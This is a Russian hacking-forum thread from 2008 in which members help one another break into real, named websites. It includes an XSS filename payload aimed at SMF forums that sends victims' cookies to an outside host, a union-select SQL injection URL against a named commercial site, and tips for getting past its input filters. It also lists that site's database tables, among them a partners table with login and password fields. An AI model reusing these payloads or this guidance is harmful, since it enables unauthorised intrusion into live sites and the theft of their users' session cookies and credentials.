Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Всё прально, вместо цифр ставь текст : alert(/gagaga/) или alert(135)

    Про XSS тут дофига статей, пофтыкай побольше.Если те нужен перевод, пиши на 292-514-125 : )
     
  2. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ой мля,ступил ппц.Это атака через хттр заголовок Expect.Для этого надо создать объект и послать,лично не пробывал:Р.Прост этот торч надеется на то, что через ие и файрфокс так сделать нельзя(и правильно делает),но через объекты мона.
     
    1 person likes this.
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Послушай, юноша, за каким хреном писать такой бред?
    vampir3a
    Вот немного об уязвимости на русском, но не особо обольщайся, сканер нашёл это не значит ,что получится использовать
    _http://www.securitylab.ru/analytics/271169.php
     
    2 people like this.
  4. +r0ot?r+

    +r0ot?r+ Banned

    Joined:
    28 Apr 2008
    Messages:
    15
    Likes Received:
    3
    Reputations:
    0
    1.Есть форум, Powered by SMF 1.1.x,как узнать х?
    2.Надеясь на удачу(что версия <=1.1.4), пробую приаттачить файл со следующим названием:
    Code:
    abc<img src= .width=1 height=1 onerror=javascriptnew&#32Image().src='http&#47&#47s.netsec.ru&#47arm.gif'+document.cookie>.txt
    Но выдаётся ошибка:

    Code:
    default.htm.
    Вы не можете отправить этот файл. Доступны только следующие типы файлов doc,gif,jpg,mpg,pdf,png,txt,zip.
     
  5. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Подскажите это уязвимость или нет?

    помоему да, т.к при таком запросе не происходит редирект на главную страницу. Но ни одно из полей не выводится :(
    ---------------------------------------
    Извиняюсь сплоховал, менял значения в partner :)
    Спасибо ZAMUT!!!
     
    #1865 samarin, 5 May 2008
    Last edited: 5 May 2008
  6. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    samarin, просто замени на несуществующее значение id, -1 к примеру. Вывод есть.
     
  7. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    или
    http://www.intone.ru/get2.php?partner=269&id=89596/**/and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29/*
     
  8. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Вывод то есть, а каким образом вывести что нибудь интересное? ведь доступа к information_schema нету, и намека, хоть на какое-то название таблиц тоже.
    Довольно интересный случай (я только учусь и такого еще не встречал).
     
  9. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    фильтруется from
     
  10. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Там походу фильтры Get-post переменных стоят, ибо как что нормальное в инъекцию прописываешь аля Information_schema.tables, то выдаёт такую байду: "Ваш запрос отвергнут по причине его возможной небезопасности". Хотя классический Union+select даёт вывод в страницу...
     
  11. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    все верно, фильтрация идет при Get/post запросах.
     
  12. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    а через куки? )
     
  13. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    попробуй закодировать в %20%40%xx у меня раз был случай когда так прокатывало, а чистый запрос отвергало.
     
  14. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Чойто за 20 40 :РР. Я где-то читал,что мона попробывать передать гет переменные постом и наоборот:Р. Вродь катит.. )А ф топку такие замуты )
     
  15. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Велемир http://ha.ckers.org/xss.html внизу страницы можно перекодировать :)
     
    1 person likes this.
  16. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    url encoding
     
    1 person likes this.
  17. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Всем конечно спасибо за то что откликнулись, но url encoding не катит.
    У меня не получилось обойти-может что то посоветуешь?
    -----------------------------------------------------------
    Возможно ли вытащить что-то интересное? если не возможно, так и скажите, чтобы я голову зря не ламал :)
     
    #1877 samarin, 7 May 2008
    Last edited: 7 May 2008
  18. goror

    goror New Member

    Joined:
    19 Mar 2008
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0

    Там не from фильтруется, а последовательность
    union select from.
     
  19. goror

    goror New Member

    Joined:
    19 Mar 2008
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    На первый взгляд ничего интересного.
    Таблицы clocks,blogtext, blogsfree,freemp3,freepics

    Есть таблица jgamesru_int.partners с полями

    name,login,pass
     
  20. +r0ot?r+

    +r0ot?r+ Banned

    Joined:
    28 Apr 2008
    Messages:
    15
    Likes Received:
    3
    Reputations:
    0
    MySQL плюется данной ошибкой,как дальше ломать?При подборе кол-ва полей такого же рода ошибки.
     
Thread Status:
Not open for further replies.